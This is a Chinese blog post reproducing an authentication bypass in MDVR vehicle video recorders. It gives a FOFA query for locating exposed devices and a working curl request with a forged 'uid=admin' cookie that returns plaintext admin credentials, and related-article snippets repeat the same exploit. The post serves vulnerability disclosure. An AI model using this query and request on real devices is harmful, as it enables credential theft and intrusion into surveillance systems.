【漏洞复现】MDVR数字视频录像机认证绕过漏洞

最新推荐文章于 2024-09-29 09:01:30 发布
最新推荐文章于 2024-09-29 09:01:30 发布
阅读量536 收藏 7
点赞数 10
文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136019941
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

本文介绍了MDVR数字视频录像机的一个安全漏洞,该漏洞允许攻击者通过设置特定Cookie来访问设备的管理员控制面板,获取明文凭证。阿根廷研究员的发现表明,设备存在认证绕过风险,建议用户及时联系厂商修复。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        MDVR(Mobile Digital Video Recorders)硬盘录像机是一种使用先进的视音频编解码技术将车内外的视频进行数模转换,进行压缩存储的设备。

Nx02 漏洞描述

        阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。

Nx03 产品主页

fofa-query: "MDVR"

Nx04 漏洞复现

POC:

curl "http://127.0.0.1/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
专栏目录

已下架不支持订阅

海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
一点一滴积累!
04-01 3万+
1. 更新情况 2014年11月19日,海康威视(Hikvision)监控设备被爆严重漏洞,具体编号为CVE-2014-4878、CVE-2014-4879和CVE-2014-4880。这三个漏洞都是由于Hikvision监控设备对RTSP(实时流传输协议)请求处理不当导致的,通过该漏洞攻击者可以对设备进行DoS,甚至直接获取设备的最高权限。2. 漏洞概要 a) 漏洞描述 海
车载录像机/SD-MDVR/SW-0001A /.264文件播放器
08-11
年检车载录像机/SD-MDVR/SW-0001A /.264文件播放器 调取录像监控视频 4路
车载录像机
weixin_34257076的博客
09-25 247
1. 产品概述 Mini 双SD卡 MDVR 是专为车载监控开发的一款监控设备。它采用高速处理器和嵌入式操作系统,结合IT领域中最新的音视频压缩/解压缩技术H.264、网络技术、GPS定位技术、无线局域网技术(WIFI)以及第三代移动通信技术(3G)于一体,实现前端视频录像、远程3G及WIFI无线网络视频传输、远程报警与中心联动、远程车辆GPS定位以及车辆控制与...
车载MDVR(主机)公交、火车等需求多路视频监控系统主机
YEYUANGEN的专栏
06-13 1031
输入电压为+8V~+36V,电压长期低于8V,或长期高于36V,设备自动关机,进入保护模式。MDVR产品外观简洁、具有超强抗振,安装灵活方便,功能强大,可靠性高等特点。支持CDMA/EVDO/GPRS/WCDMA/FDD LTE/TDD LTE。模块,支持LTE/HSUPA/HSDPA/WCDMA/EVDO。支持WIFI无线下载,支持802.11b/g/n,频率。支持智能电源管理识别,低电自动关机,熄火低功耗;输出电压12V(+/-0.2V),最大电流2A。支持GPS/BD定位,灵敏度高,定位快速;
java虚拟机绕过,DVR登录绕过漏洞(CVE-2018-9995)
weixin_31302909的博客
03-16 578
###漏洞描述此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。###漏洞利用1.利用代码curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"2.poc利用https://github.com/ezelf/CVE-2018-9995_...
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1362
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
年检车载录像机/SD-MDVR/SW-0001A /.264文件播放器
03-21
年检车载录像机/SD-MDVR/SW-0001A /.264文件播放器/.264文件打开/32位
MDVR-GL-V12-20151015.bin
07-08
4路车载录像机16M固件,版号MDVR-GL-V12-20151015
h264_dvr_rce:TVT DVR上的远程代码执行漏洞
05-14
h264_dvr_rce 博客文章-http:
CamRaptor:针对DVR摄像头的漏洞利用工具
weixin_43977912的博客
10-09 1026
关于CamRaptor CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。 功能介绍 能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。 经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。 简单的命令行接口和API使用方法。 工具安装 由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广
黑客正在利用 TBK DVR 设备中五年未修复的 0day
smellycat000的专栏
05-04 722
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士FortiGuard Labs 发布安全公告指出,威胁行动者们正在利用影响 TBK 数字化视频记录 (DVR) 设备的一个未修复漏洞 (CVE-2018-9995)。该漏洞已存在五年之久。CVE-2018-9995的CVSS 评分为9.8,是一个认证绕过漏洞,可被远程攻击者用于提升权限。Fortinet 在5月1日发布的文章中剃刀,“该已存在五年...
DVR登录绕过漏洞_CVE-2018-9995漏洞复现
WY92139010的博客
06-30 1354
DVR登录绕过漏洞_CVE-2018-9995漏洞复现 一、漏洞描述 此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。 二、影响软件以及版本 Novo CeNova QSee Pulnix XVR 5 in 1 (title: "XVR Login") Securus, - Security. Nev...
Android VR视频
FC小司的博客
08-17 2619
话不多说,先上图(眼睛模式) 参考的开源库——传送门 MD360Player4Android 在开源库的基础上,做了菜单和播放器逻辑。 VR功能的部分通过依赖vrlib来实现,视频播放的部分集成ijkPlayer 这里对MD360Player4Android中的一些代码做解释。 初始化VR播放器 @Override protected MDVRLibrar...
cve-2018-9995 dvr登录绕过漏洞
weixin_34311757的博客
06-04 340
本帖最后由 Snow狼 于 2018-6-4 10:27 编辑 dvr登录绕过漏洞漏洞允许×××者构造一个cookie即可登录漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"测试有此漏洞的dvr:NovoCeNovoQSeePulnix ...
DVR登录绕过漏洞(CVE-2018-9995)
weixin_30335575的博客
05-09 590
###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ez...
云计算中过等保三级需要的网络安全设备及详细讲解
最新发布
weixin_59571541的博客
09-29 787
随着云计算技术的发展,数据的存储和处理逐渐向云端迁移,这在提高工作效率的同时,也带来了许多安全挑战。在中国,《网络安全等级保护条例》将网络安全分为五个等级,其中等级保护三级(等保三级)是针对中等风险环境下的安全要求。要保障云计算环境中的数据安全和业务连续性,必须部署一系列合适的网络安全设备。本文将详细介绍等保三级所需的主要网络安全设备。
宏电H3225A-K MDVR车载硬盘录像机使用指南
宏电无线车载硬盘录像机MDVR H3225A-K 是一款专为车载监控设计的高端设备,具备四路音视频采集、存储和3G传输功能。这款设备旨在提供全面的车载安全解决方案,确保车辆在行驶过程中的安全与监控。 产品特点: 1. 四...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值